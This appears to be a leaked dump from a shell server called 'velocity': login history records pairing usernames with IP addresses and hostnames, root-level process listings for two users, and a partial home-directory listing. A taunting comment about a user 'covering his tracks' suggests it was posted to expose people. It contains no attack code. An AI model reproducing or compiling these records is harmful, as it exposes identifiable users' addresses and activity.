pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12 (00:01)
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07 (00:14)
pimpinjg ttyp2 cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42 (00:00)
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41 (00:12)
pimpinjg ttypd cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44 (00:41)
pimpinjg ttypd cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52 (00:42)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37 (00:06)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29 (00:01)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26 (00:00)
pimpinjg ttype cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25 (00:01)
romeo ttypg 188.49.118.210 Wed Jun 17 18:35 - 18:35 (00:00) // RoMeO covering his tracks, once again.. lulz
cpu ttype 63-253-113-213.i Wed Jun 17 17:50 - 17:54 (00:04)
cpu ttypd 63-253-113-213.i Wed Jun 17 17:33 - 19:56 (02:22)
cpu ttypd 63-253-113-213.i Wed Jun 17 17:23 - 17:27 (00:04)
katsst ttypd adsl-76-240-177- Wed Jun 17 12:39 - 13:09 (00:30)
yaquis ttyp2 ip72-223-92-235. Wed Jun 17 01:49 - 01:54 (00:05)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:46 - 20:16 (00:30)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:33 - 19:46 (00:13)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:24 - 19:33 (00:08)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:16 - 19:24 (00:07)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 19:08 - 19:16 (00:08)
katsst ttyp9 adsl-76-240-177- Tue Jun 16 19:01 - 19:08 (00:07)
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:44 - 19:01 (00:16)
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:37 - 18:44 (00:06)
yaquis ttypd ip72-223-92-235. Tue Jun 16 18:12 - 18:20 (00:07)
katsst ttyp9 adsl-76-240-177- Tue Jun 16 18:02 - 18:32 (00:30)
katsst ttyp2 adsl-76-240-177- Tue Jun 16 13:47 - 14:17 (00:30)
matt ttyp2 71-91-220-184.dh Tue Jun 16 10:58 - 11:40 (00:42)
devil ttyp2 190.42.73.135 Tue Jun 16 10:18 - 10:18 (00:00)
katsst ttyp9 cpe-75-84-149-5. Tue Jun 16 00:10 - 00:40 (00:30)
katsst ttyp2 cpe-75-84-149-5. Tue Jun 16 00:08 - 00:38 (00:30)
katsst ttyp2 cpe-75-84-149-5. Mon Jun 15 22:45 - 23:15 (00:30)
matt ttyp2 71-91-220-184.dh Mon Jun 15 22:05 - 22:19 (00:14)
kruapra ttyp2 75.80.56.213 Mon Jun 15 21:13 - 21:43 (00:30)
yaquis ttyp9 189.176.226.15 Mon Jun 15 15:57 - 15:57 (00:00)
matt ttyp2 71-91-220-184.dh Mon Jun 15 15:52 - 16:18 (00:26)
chaos1 ttyp2 94-195-18-213.zo Mon Jun 15 13:53 - 14:26 (00:33)
crrj13 ttyp2 c-24-23-247-110. Mon Jun 15 13:01 - 13:01 (00:00)
crrj13 ttypd h-67-103-110-220 Mon Jun 15 12:48 - 12:53 (00:05)
katsst ttyp9 cpe-75-84-149-5. Mon Jun 15 12:31 - 13:01 (00:30)
ste ttyp2 doc-24-32-94-198 Mon Jun 15 12:22 - 12:59 (00:37)
katsst ttyp6 cpe-75-84-149-5. Mon Jun 15 05:43 - 06:13 (00:30)
alexbb ttyp6 53551eb9.cable.c Sun Jun 14 22:36 - 22:41 (00:05)
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 22:20 - 22:50 (00:30)
katsst ttyp9 cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41 (00:30)
katsst ttyp8 cpe-75-84-149-5. Sun Jun 14 16:11 - 16:41 (00:30)
kruapra ttyp6 75.80.56.213 Sun Jun 14 13:17 - 13:19 (00:02)
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 10:44 - 16:13 (05:29)
katsst ttyp6 cpe-75-84-149-5. Sun Jun 14 09:48 - 10:18 (00:30)
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 07:42 - 08:12 (00:30)
katsst ttyp2 cpe-75-84-149-5. Sun Jun 14 00:29 - 00:59 (00:30)
poolboy ttyp2 pool-173-77-179- Sat Jun 13 22:47 - 23:21 (00:33)
matt ttyp8 71.81.151.8 Sat Jun 13 21:01 - 22:39 (01:37)
yaquis ttyp6 ip72-223-92-235. Sat Jun 13 20:54 - 21:35 (00:41)
katsst ttyp2 cpe-75-84-149-5. Sat Jun 13 20:37 - 21:07 (00:30)
katsst ttyp2 adsl-76-240-177- Sat Jun 13 17:26 - 17:56 (00:30)
kruapra ttyp2 75.80.56.213 Sat Jun 13 15:57 - 16:04 (00:06)
kruapra ttyp2 75.80.56.213 Sat Jun 13 15:19 - 15:43 (00:24)
katsst ttyp2 adsl-76-240-177- Sat Jun 13 13:01 - 13:31 (00:30)
katsst ttyp2 cpe-75-84-149-5. Sat Jun 13 11:49 - 12:19 (00:30)
katsst ttyp6 cpe-75-84-149-5. Sat Jun 13 09:15 - 09:45 (00:30)
matt ttyp2 71-14-179-247.dh Fri Jun 12 23:23 - 00:56 (01:33)
lyhne1 ttyp2 74-44-57-79.dr01 Fri Jun 12 21:25 - 21:37 (00:11)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 15:01 - 15:05 (00:03)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:55 - 15:01 (00:06)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:47 - 14:54 (00:06)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:39 - 14:47 (00:07)
katsst ttyp6 adsl-76-240-177- Fri Jun 12 14:34 - 14:39 (00:04)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:32 - 14:36 (00:03)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:31 - 14:32 (00:01)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:20 - 14:31 (00:10)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:14 - 14:19 (00:05)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:11 - 14:14 (00:03)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 14:01 - 14:10 (00:09)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:52 - 14:01 (00:08)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:49 - 13:52 (00:03)
yaquis ttyp6 189.172.83.139 Fri Jun 12 13:31 - 13:36 (00:05)
katsst ttyp2 adsl-76-240-177- Fri Jun 12 13:26 - 13:49 (00:23)
matt ttyp2 71.81.144.125 Fri Jun 12 11:56 - 12:16 (00:20)
matt ttyp2 71-91-221-246.dh Thu Jun 11 22:15 - 03:21 (05:05)
matt ttyp2 71-91-221-246.dh Thu Jun 11 20:58 - 21:02 (00:03)
yaquis ttyp2 ip72-223-92-235. Thu Jun 11 20:24 - 20:55 (00:31)
kruapra ttyp2 75.80.56.213 Thu Jun 11 19:49 - 20:19 (00:30)
smash ttyp6 88.196.163.223 Thu Jun 11 17:10 - 18:03 (00:53)
yaquis ttyp2 189.176.224.156 Thu Jun 11 16:20 - 16:24 (00:04)
yaquis ttyp2 189.176.224.156 Thu Jun 11 16:11 - 16:16 (00:05)
yaquis ttyp6 189.176.224.156 Thu Jun 11 14:31 - 14:32 (00:01)
hts ttyp2 pool-71-114-161- Thu Jun 11 10:54 - 10:56 (00:01)
sysc ttyp6 66.197.170.181 Thu Jun 11 07:33 - 07:52 (00:19)
sysc ttyp6 66.197.170.181 Thu Jun 11 07:13 - 07:26 (00:13)
blkgraz ttyp2 71.252.210.34 Thu Jun 11 06:15 - 10:54 (04:39)
sysc ttyp2 218.236.90.157 Thu Jun 11 05:38 - 05:43 (00:04)
alexbb ttyp2 83.85.30.185 Thu Jun 11 04:46 - 04:49 (00:03)
blkgraz ttyp2 71.252.210.34 Thu Jun 11 04:00 - 04:46 (00:45)
ioplex ttyp2 66.229.254.200 Wed Jun 10 22:30 - 22:44 (00:14)
ioplex ttyp2 66.229.254.200 Wed Jun 10 22:00 - 22:30 (00:30)
ioplex ttyp2 66.229.254.200 Wed Jun 10 21:29 - 21:59 (00:30)
ioplex ttyp2 66.229.254.200 Wed Jun 10 20:59 - 21:29 (00:30)
matt ttyp6 75.130.209.152 Wed Jun 10 20:54 - 00:28 (03:33)
ioplex ttyp2 66.229.254.200 Wed Jun 10 20:29 - 20:59 (00:30)
bollox ttyp2 81.129.70.166 Wed Jun 10 16:42 - 17:01 (00:18)
qfx ttyp2 62.194.154.102 Wed Jun 10 14:29 - 15:38 (01:08)
blkgraz ttyp6 71.252.210.34 Wed Jun 10 03:38 - 20:54 (17:16)
hts ttyp6 71.114.161.104 Wed Jun 10 00:28 - 00:29 (00:00)
sqd ftp 121.210.177.215 Tue Jun 9 19:46 - 19:51 (00:05)
crrj13 ttyp6 71.202.99.66 Tue Jun 9 16:50 - 16:51 (00:00)
katsst ttyp6 76.240.177.107 Tue Jun 9 14:55 - 15:25 (00:30)
matt ttyp2 71.81.151.141 Tue Jun 9 14:27 - 04:04 (13:36)
redrum ttyp2 iani.de Tue Jun 9 13:36 - 13:38 (00:02)
katsst ttyp8 76.240.177.107 Tue Jun 9 13:34 - 14:04 (00:30)
redrum ttyp2 iani.de Tue Jun 9 13:33 - 13:35 (00:01)
katsst ttyp2 76.240.177.107 Tue Jun 9 13:01 - 13:31 (00:30)
chaos1 ttyp6 69.143.254.180 Tue Jun 9 12:53 - 13:36 (00:42)
redrum ttyp2 iani.de Tue Jun 9 12:48 - 13:01 (00:12)
qfx ttyp2 62.194.154.102 Tue Jun 9 11:06 - 11:37 (00:31)
psycoz ttyp2 81.173.252.237 Tue Jun 9 05:28 - 05:34 (00:06)
alexbb ttyp6 83.85.30.185 Mon Jun 8 23:26 - 03:39 (04:13)
yaquis ttyp6 72.223.92.235 Mon Jun 8 22:37 - 22:57 (00:20)
matt ttyp6 75.130.211.22 Mon Jun 8 20:46 - 21:03 (00:16)
blkgraz ttyp8 71.252.210.34 Mon Jun 8 20:13 - 13:34 (17:21)
ste ttyp6 69.29.159.182 Mon Jun 8 19:10 - 20:46 (01:36)
matt ttyp2 75.130.211.22 Mon Jun 8 17:20 - 00:57 (07:37)
matt ttyp6 75.130.211.22 Mon Jun 8 16:28 - 17:15 (00:46)
matt ttyp2 75.130.211.22 Mon Jun 8 13:29 - 16:30 (03:01)
matt ttyp2 75.130.211.22 Mon Jun 8 13:12 - 13:28 (00:16)
alexbb ttyp8 83.85.30.185 Mon Jun 8 11:26 - 12:18 (00:52)
matt ttyp6 75.130.211.22 Mon Jun 8 11:24 - 11:32 (00:08)
matt ttyp2 75.130.211.22 Mon Jun 8 11:21 - 11:51 (00:30)
chaos1 ttyp2 69.143.254.180 Mon Jun 8 06:25 - 06:29 (00:03)
alexbb ttyp6 83.85.30.185 Sun Jun 7 21:59 - 22:31 (00:31)
chaos1 ttyp6 69.143.254.180 Sun Jun 7 21:09 - 21:11 (00:01)
yaquis ttyp6 72.223.92.235 Sun Jun 7 19:05 - 19:28 (00:22)
matt ttyp2 71.81.144.135 Sun Jun 7 18:25 - 00:49 (06:23)
matt ttyp2 71.81.144.135 Sun Jun 7 18:02 - 18:25 (00:23)
yaquis ttyp2 72.223.92.235 Sun Jun 7 17:25 - 17:56 (00:31)
psycoz ttyp2 84.44.225.41 Sun Jun 7 17:01 - 17:13 (00:11)
psycoz ttyp2 84.44.225.41 Sun Jun 7 16:51 - 17:01 (00:10)
alexbb ftp 53551EB9.cable. Sun Jun 7 15:40 - 15:40 (00:00)
alexbb ttyp2 83.85.30.185 Sun Jun 7 15:30 - 15:42 (00:12)
sysc ttyp2 24.183.103.36 Sun Jun 7 12:18 - 12:59 (00:41)
yaquis ttyp2 72.223.92.235 Sun Jun 7 01:52 - 02:28 (00:35)
kruapra ttyp2 75.80.56.213 Sat Jun 6 21:29 - 21:59 (00:30)
cazz1961 ttyp2 81.159.148.247 Sat Jun 6 19:03 - 19:40 (00:36)
cazz1961 ttyp6 90.205.23.22 Sat Jun 6 18:37 - 19:07 (00:30)
katsst ttyp2 76.240.177.107 Sat Jun 6 18:24 - 18:54 (00:30)
katsst ttyp2 76.240.177.107 Sat Jun 6 16:18 - 16:48 (00:30)
katsst ttyp2 76.240.177.107 Sat Jun 6 12:34 - 13:04 (00:30)
sysc ttyp2 66.197.170.181 Sat Jun 6 11:54 - 12:08 (00:14)
yaquis ttyp2 189.176.79.52 Sat Jun 6 11:38 - 11:45 (00:07)
devil ttyp6 190.42.90.138 Sat Jun 6 09:34 - 09:34 (00:00)
cazz1961 ttyp2 90.205.23.123 Sat Jun 6 09:21 - 09:55 (00:33)
howell1 ttyp2 93.97.125.103 Sat Jun 6 08:22 - 08:22 (00:00)
asriel ttyp2 66.197.170.181 Sat Jun 6 07:36 - 07:37 (00:00)
sysc ttyp2 66.197.170.181 Sat Jun 6 06:57 - 07:32 (00:35)
yaquis ttyp2 72.223.92.235 Sat Jun 6 01:18 - 01:44 (00:25)
yaquis ttyp2 189.176.79.52 Sat Jun 6 01:11 - 01:13 (00:02)
blkgraz ttyp8 71.252.210.34 Fri Jun 5 18:54 - 11:26 (2+16:31)
katsst ttyp6 76.240.177.107 Fri Jun 5 18:41 - 19:11 (00:30)
smash ttyp6 ntora.eml.ee Fri Jun 5 18:07 - 18:07 (00:00)
smash ttyp8 ntora.eml.ee Fri Jun 5 15:03 - 15:03 (00:00)
chaos1 ttyp6 69.143.254.180 Fri Jun 5 15:02 - 15:52 (00:50)
chaos1 ttyp8 69.143.254.180 Fri Jun 5 12:34 - 12:40 (00:06)
smash ttyp6 ntora.eml.ee Fri Jun 5 12:18 - 13:09 (00:50)
yaquis ttyp6 72.223.92.235 Fri Jun 5 00:56 - 01:21 (00:24)
smash ttyp6 ntora.eml.ee Fri Jun 5 00:13 - 00:21 (00:07)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:41 - 19:45 (00:03)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:36 - 19:41 (00:05)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:32 - 19:35 (00:03)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:27 - 19:31 (00:04)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:18 - 19:27 (00:09)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:13 - 19:17 (00:04)
katsst ttyp6 76.240.177.107 Thu Jun 4 19:04 - 19:13 (00:08)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:57 - 19:04 (00:06)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:52 - 18:57 (00:04)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:41 - 18:52 (00:10)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:39 - 18:41 (00:02)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:28 - 18:39 (00:10)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:18 - 18:24 (00:06)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:14 - 18:18 (00:03)
katsst ttyp6 76.240.177.107 Thu Jun 4 18:08 - 18:14 (00:06)
katsst ttyp8 76.240.177.107 Thu Jun 4 18:06 - 18:06 (00:00)
katsst ttyp6 76.240.177.107 Thu Jun 4 17:55 - 18:08 (00:12)
bollox ftp host81-129-70-1 Thu Jun 4 17:47 - 17:49 (00:01)
katsst ttyp6 76.240.177.107 Thu Jun 4 17:44 - 17:55 (00:11)
katsst ttyp6 76.240.177.107 Thu Jun 4 17:34 - 17:44 (00:10)
katsst ttyp6 76.240.177.107 Thu Jun 4 17:29 - 17:34 (00:04)
smash ttyp6 88.196.163.223 Thu Jun 4 16:39 - 17:06 (00:27)
bollox ttyp9 81.129.70.166 Thu Jun 4 16:12 - 16:44 (00:32)
bollox ftp host81-129-70-1 Thu Jun 4 16:05 - 16:09 (00:04)
chaos1 ttyp8 94.195.18.213 Thu Jun 4 15:50 - 16:23 (00:32)
chaos1 ttyp6 67.86.132.29 Thu Jun 4 15:49 - 16:15 (00:26)
chaos1 ttyp6 69.143.254.180 Wed Jun 3 23:06 - 23:52 (00:45)
apo ttyp8 75.158.79.102 Wed Jun 3 12:38 - 12:44 (00:05)
apo ttyp6 75.158.79.102 Wed Jun 3 12:20 - 12:54 (00:33)
blkgraz ttyp2 70.104.27.82 Wed Jun 3 12:01 - 19:16 (2+07:15)
smash ttyp2 ntora.eml.ee Tue Jun 2 21:03 - 22:35 (01:32)
kruapra ttyp2 75.80.56.213 Tue Jun 2 20:05 - 20:35 (00:30)
katsst ttyp6 76.240.177.107 Tue Jun 2 14:30 - 15:00 (00:30)
blkgraz ttyp6 71.252.210.34 Tue Jun 2 10:39 - 11:36 (00:57)
blkgraz ttyp2 71.252.210.34 Tue Jun 2 09:51 - 18:17 (08:26)
crrj13 ttyp2 24.23.247.110 Mon Jun 1 23:54 - 00:00 (00:06)
crrj13 ttyp2 69.3.47.203 Mon Jun 1 23:19 - 23:32 (00:13)
redrum ttyp6 ist.kuscheli.ch Mon Jun 1 13:49 - 14:11 (00:21)
blkgraz ttyp2 71.252.210.34 Mon Jun 1 12:26 - 23:19 (10:53)
lordy ttyp2 76.108.112.60 Mon Jun 1 06:20 - 06:21 (00:01)
[root@velocity:~]# ps -aux | grep romeo
root 83591 0.0 0.2 5400 2068 ?? Is 9:16AM 0:00.38 sshd: romeo [priv] (sshd)
romeo 83595 0.0 0.2 5384 2120 ?? S 9:16AM 0:04.62 sshd: (sshd)
root 32336 0.0 0.1 1592 892 p2 S+ 7:39PM 0:00.00 grep romeo
romeo 20712 0.0 0.1 3272 1248 p9 Is Wed06AM 0:00.13 /usr/local/bin/bash
romeo 66004 0.0 0.7 10124 6844 p9 S+ Sat10AM 2:07.98 irssi -h absolute.ownage.net
romeo 24414 0.0 0.1 2040 1444 pf S+ 4:23PM 0:00.04 screen -r
romeo 83597 0.0 0.2 3240 1868 pf Is 9:16AM 0:00.04 -bash (bash)
[root@velocity:~]#
[root@velocity:~]# ps -aux | grep pimpinjg
root 82323 0.0 0.2 5400 2120 ?? Is 8:47AM 0:00.07 sshd: pimpinjg [priv] (sshd)
pimpinjg 82325 0.0 0.2 5384 2128 ?? I 8:47AM 0:00.35 sshd: pimpinjg@ttypd (sshd)
root 32340 0.0 0.1 1548 880 p2 R+ 7:39PM 0:00.00 grep pimpinjg
pimpinjg 29257 0.0 0.1 2040 1444 pd S+ 6:20PM 0:00.03 screen -r
pimpinjg 82327 0.0 0.2 3232 1844 pd Is 8:47AM 0:00.03 -bash (bash)
pimpinjg 20846 0.0 0.2 3268 1856 pe Is 9:24PM 0:00.05 /usr/local/bin/bash
pimpinjg 82595 0.0 0.7 10476 7720 pe S+ 8:52AM 0:16.87 irssi -h 72.20.28.206
[root@velocity:/home]# ls -la
total 820
drwx--x--x 204 root wheel 3584 Jun 17 18:30 ./
drwxr-xr-x 24 root wheel 512 Jun 15 07:35 ../
drwxr-xr-x 4 ac1115 ac1115 512 Jul 10 2008 ac1115/
drwxr-xr-x 4 burnt burnt 512 Apr 22 2005 ad/
drwxr-xr-x 3 nek0o nek0o 512 Feb 26 2007 adro/
drwxr-xr-x 3 alexbb alexbb 512 Jun 8 23:27 alexbb/
drwxr-xr-x 2 anux anux 512 Feb 12 2008 anux/
drwxr-xr-x 6 apo apo 512 Sep 28 2008 apo/
drwxr-xr-x 5 1162 1162 512 Mar 7 2007 arcade/
drwxr-xr-x 2 asriel asriel 512 Jun 6 07:37 asriel/
drwxr-xr-x 6 athemp athemp 512 Aug 6 2007 athemp/
drwxr-xr-x 2 daali daali 512 Mar 1 2005 badwolf/
drwxr-xr-x 3 baxxta baxxta 512 Jul 22 2008 baxxta/
drwxr-xr-x 2 bbblade1 bbblade1 512 Jan 15 2008 bbblade1/
drwxr-xr-x 7 1154 1154 512 Oct 9 2005 biffter/
drwxr-xr-x 3 blake96 blake96 512 Dec 9 2008 blake96/
drwxr-xr-x 2 1033 1033 512 Mar 1 2005 blazin/
drwxr-xr-x 5 blkgraz blkgraz 512 Mar 30 23:25 blkgraz/
drwxr-xr-x 7 blotch blotch 512 Dec 14 2008 blotch/
drwxr-xr-x 9 bluewish bluewish 512 Apr 13 10:40 bluewish/
drwxr-xr-x 4 methanl methanl 512 Apr 11 2007 blunted/
drwxr-xr-x 2 bnoel bnoel 512 Dec 5 2007 bnoel/
drwxr-xr-x 14 bollox bollox 1024 Feb 18 2008 bollox/
drwxr-xr-x 4 1146 1146 512 Jul 6 2005 boxing/
drwxr-xr-x 3 bpunux bpunux 512 Oct 31 2008 bpunux/
drwxr-xr-x 2 brex132 brex132 512 Jun 7 12:29 brex132/
drwxr-xr-x 2 brosb4 brosb4 512 Nov 26 2008 brosb4/
drwxr-xr-x 6 brosco brosco 512 Mar 22 06:08 brosco/
drwxr-xr-x 5 bruhaha bruhaha 512 Aug 12 2008 bruhaha/
drwxr-xr-x 5 1226 1226 512 Nov 23 2006 bubba01/
drwxr-xr-x 13 burnt burnt 1024 Mar 24 2008 burnt/
drwxr-xr-x 4 1117 1117 512 Mar 18 2005 c00ps/
drwxr-xr-x 3 1048 1048 512 Apr 20 2007 cake/
drwxr-xr-x 5 cappy57 cappy57 512 Jul 13 2007 cappy57/
drwxr-xr-x 4 cassand cassand 512 Mar 19 14:35 cassand/
drwxr-xr-x 5 cazz1961 cazz1961 512 Apr 14 17:23 cazz1961/
drwxr-xr-x 6 ceejay ceejay 512 Nov 23 2007 ceejay/
drwxr-xr-x 8 chaos1 chaos1 1024 Feb 6 15:26 chaos1/
drwxr-xr-x 6 1251 1251 512 Mar 9 2007 chatnet/
drwxr-xr-x 6 comedy comedy 512 Jan 20 2007 cheazey/
drwxr-xr-x 5 chevym4n chevym4n 512 Nov 23 2008 chevym4n/
drwxr-xr-x 3 chozen1 chozen1 512 Jan 26 19:31 chozen1/
drwxr-xr-x 5 chrirc chrirc 512 Jun 12 2008 chrirc/
drwxr-xr-x 2 chrisdad chrisdad 512 Dec 18 2008 chrisdad/
drwxr-xr-x 2 chriys chriys 512 Dec 3 2008 chriys/
drwxr-xr-x 7 1085 1085 512 Feb 11 2007 cloudy1/
drwxr-xr-x 7 cmm cmm 1024 May 9 07:01 cmm/
drwxr-xr-x 2 comedy comedy 512 May 22 2008 comedy/
drwxr-xr-x 3 cont cont 512 Jan 11 18:13 cont/
drwxr-xr-x 2 coolcat coolcat 512 Mar 18 2008 coolcat/
drwxr-xr-x 2 corley corley 512 May 12 2008 corley/
drwx--x--x 9 cpu cpu 1024 Apr 14 15:23 cpu/
drwxr-xr-x 13 crash crash 1024 Feb 19 20:40 crash/
drwxr-xr-x 7 crazie crazie 512 Nov 26 2007 crazie/
drwxr-xr-x 8 crazyl crazyl 1024 Apr 13 2007 crazyl/
drwxr-xr-x 23 crrj13 crrj13 1536 Mar 23 17:27 crrj13/
drwxr-xr-x 9 1159 1159 512 Sep 5 2005 d3vil/
drwxrwxrwx 8 daali daali 512 Mar 11 2008 daali/
drwxr-xr-x 7 dano30 dano30 512 Apr 12 2007 dano30/
drwxr-xr-x 4 darien9 darien9 1536 Oct 31 2008 darien9/
drwxr-xr-x 7 dark dark 512 Sep 3 2007 dark/
drwxr-xr-x 6 darkevil darkevil 512 Mar 25 2008 darkevil/
drwxr-xr-x 5 darkuno3 darkuno3 512 Mar 10 10:27 darkuno3/
drwxr-xr-x 2 dasboot dasboot 512 Mar 13 13:55 dasboot/
drwx------ 11 1093 1093 512 Feb 5 2006 dave/
drwxr-xr-x 7 dealer dealer 512 Feb 25 01:01 dealer/
drwxr-xr-x 6 1123 1123 512 Mar 1 2007 deathbal/
drwxr-xr-x 2 delion1 delion1 512 Feb 22 16:51 delion1/
drwxr-xr-x 3 cazz1961 cazz1961 512 Mar 1 2005 denial/
drwxr-xr-x 5 devil devil 512 May 22 10:21 devil/
drwxr-xr-x 3 sqd sqd 512 Dec 4 2006 digital/
drwxr-xr-x 8 digitalman digitalman 512 May 20 14:26 digitalman/
drwxr-xr-x 5 1176 1176 512 Jan 16 2007 dizzle/
drwxr-xr-x 3 djkarl djkarl 512 Jan 10 12:23 djkarl/
drwxr-xr-x 2 djspark djspark 512 Jun 24 2008 djspark/
drwxr-xr-x 7 chrirc chrirc 512 Jan 6 2007 doomed/
drwxr-xr-x 8 dravas dravas 1024 Sep 29 2007 dravas/
drwxr-xr-x 2 dv327 dv327 512 Apr 8 2007 drk9/
drwxr-xr-x 5 1259 1259 512 Apr 11 2007 dust/
drwxr-xr-x 3 dv327 dv327 512 Aug 9 2008 dv327/
drwxr-xr-x 8 edgein edgein 512 Feb 13 2008 edgein/
drwxr-xr-x 8 en0prcv en0prcv 512 Apr 14 2007 en0prcv/
drwxr-xr-x 4 evino evino 512 Jan 18 2006 evino/
drwxr-xr-x 7 blkgraz blkgraz 512 Mar 1 2005 evino2k5/
drwxr-xr-x 4 root wheel 512 Apr 12 2007 execute/
drwxr-xr-x 3 f3d0r f3d0r 512 Jul 31 2007 f3d0r/
drwxr-xr-x 2 feed feed 512 Aug 21 2008 feed/
drwxr-xr-x 4 genosyde genosyde 512 Jan 27 18:18 genosyde/
drwxr-xr-x 2 grindey grindey 512 Mar 25 2008 grindey/
drwxr-xr-x 2 groove groove 512 Apr 12 2007 groove/
drwxr-xr-x 5 grumpy grumpy 512 Feb 4 18:06 grumpy/
drwxr-xr-x 4 hh360 hh360 512 May 19 2008 hh360/
drwxr-xr-x 2 hixk hixk 512 Nov 24 2008 hixk/
drwxr-xr-x 3 howell1 howell1 512 May 29 20:39 howell1/
drwxr-xr-x 12 hts hts 1024 Jun 20 20:58 hts/
drwxr-xr-x 2 hw4tbnc hw4tbnc 512 May 11 2008 hw4tbnc/
drwxr-xr-x 4 ioplex ioplex 512 May 8 20:16 ioplex/
drwxr-xr-x 6 ircjaymz ircjaymz 512 Mar 18 2008 ircjaymz/
drwxr-xr-x 2 ircusr ircusr 512 Jan 20 17:49 ircusr/
drwxr-xr-x 2 itzkorn itzkorn 512 Apr 12 2007 itzkorn/
drwxr-xr-x 2 izedd izedd 512 Oct 9 2007 izedd/
drwxr-xr-x 2 jaiven jaiven 512 Feb 16 17:08 jaiven/
drwxr-xr-x 4 jamesn jamesn 512 May 31 2007 jamesn/
drwxr-xr-x 8 jax66 jax66 1024 May 14 16:03 jax66/
drwxr-xr-x 2 jerryste jerryste 512 Dec 28 14:19 jerryste/
-rw-r--r-- 1 root wheel 0 Oct 5 2007 jj.log
drwxr-xr-x 2 jschultk jschultk 512 May 31 2007 jschultk/
drwxr-xr-x 2 jtracy jtracy 512 Dec 3 2008 jtracy/
drwxr-xr-x 2 katsst katsst 512 Apr 12 2007 katsst/
drwxr-xr-x 15 khicks khicks 1024 Jan 2 2008 khicks/
drwxr-xr-x 2 kingzy kingzy 512 Feb 22 16:50 kingzy/
drwxr-xr-x 4 kokoryu kokoryu 512 Feb 1 16:54 kokoryu/
drwxr-xr-x 2 kooner kooner 512 Mar 24 17:34 kooner/
drwxr-xr-x 2 kruapra kruapra 512 Jan 1 2008 kruapra/
drwxr-xr-x 2 ksafusi ksafusi 512 Jan 29 2008 ksafusi/
drwxr-xr-x 2 l33t l33t 512 Apr 12 2007 l33t/
drwxr-xr-x 2 lailoke lailoke 512 Mar 11 22:12 lailoke/
drwxr-xr-x 9 lordy lordy 512 May 17 04:05 lordy/
drwxr-xr-x 8 ltootle ltootle 512 Jun 10 2008 ltootle/
drwxr-xr-x 15 lyhne1 lyhne1 1024 May 25 23:00 lyhne1/
drwxr-xr-x 6 lymelyte lymelyte 512 Mar 29 14:18 lymelyte/
drwxr-xr-x 3 lynx lynx 512 May 28 2008 lynx/
drwxr-xr-x 2 mae21 mae21 512 Mar 8 21:02 mae21/
drwxr-xr-x 5 manboo manboo 512 Jul 7 2008 manboo/
drwxr-xr-x 3 matt matt 512 Jun 20 19:25 matt/
drwxr-xr-x 2 methanl methanl 512 Feb 5 2008 methanl/
drwxr-xr-x 6 mimik0r mimik0r 512 May 20 2008 mimik0r/
drwxr-xr-x 2 mindben mindben 512 Nov 24 2008 mindben/
drwxr-xr-x 7 mlh mlh 512 Apr 8 01:12 mlh/
drwxr-xr-x 3 mogle3 mogle3 512 Apr 8 12:06 mogle3/
drwxr-xr-x 3 mooo mooo 512 May 21 20:50 mooo/
drwxr-xr-x 5 mrts mrts 512 Mar 18 01:51 mrts/
drwxr-xr-x 9 narcissu narcissu 512 Feb 2 2008 narcissu/
drwxr-xr-x 7 nardi nardi 512 Mar 24 10:55 nardi/
drwxr-xr-x 3 nek0o nek0o 512 Jul 21 2008 nek0o/
drwxr-xr-x 3 neohax neohax 512 Jun 13 2007 neohax/
drwxr-xr-x 3 nexxtea nexxtea 512 Apr 19 2007 nexxtea/
drwxr-xr-x 9 nodex nodex 512 Sep 5 2007 nodex/
drwxr-xr-x 2 nsc wheel 512 Apr 12 2007 nsc/
drwxr-xr-x 3 nyakz nyakz 512 Mar 13 20:13 nyakz/
drwxr-xr-x 9 oby1 oby1 512 Feb 13 2008 oby1/
drwxr-xr-x 21 omelette omelette 1024 Jun 1 2008 omelette/
